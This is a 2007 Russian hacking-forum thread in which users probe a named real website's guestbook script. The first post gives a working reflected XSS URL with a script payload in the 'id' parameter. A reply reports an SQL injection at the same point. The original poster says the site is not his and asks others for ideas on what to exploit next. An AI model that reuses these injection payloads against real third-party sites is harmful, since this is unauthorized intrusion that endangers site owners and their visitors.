xss в гостевой у бодра

Discussion in 'Песочница' started by Muhacir, 26 Apr 2007.

  1. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    респект автору :D в некоторых версиях даже скуль есть. лана чего можно сделать у кого предложения идеи

    вот пример

    Code:
    http://tmsait.ru/gbook.php?cmd=addcomment&id=<IMG%20"""><SCRIPT>alert("MuhaciR")</SCRIPT>
    нет идеи насчёт ссорсов но подпись во какая:

    HTML:
    © Oskorbin Sergey, 2004-2005
Destribute under GNU GENERAL PUBLIC LICENSE
     
    #1 Muhacir, 26 Apr 2007
  2. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    нашёл скулю:
    _http://tmsait.ru/gbook.php?cmd=addcomment&id=[sql]
    Зы: ковырять не стал , спешу на работу.
     
    #2 zl0ba, 26 Apr 2007
    1 person likes this.
  3. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Какой страшный сайт.... алерт выскочил не сразу кстати...
     
    #3 DRON-ANARCHY, 26 Apr 2007
    1 person likes this.
  4. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    да ето сессию дает с перва
    + не мой етот сайт
     
    #4 Muhacir, 27 Apr 2007
  5. Luc1fer

    Luc1fer New Member

    Joined:
    15 Apr 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Скорее всего для функции постинга нужна сессия и он делает редирект если юзер без неё
     
    #5 Luc1fer, 27 Apr 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.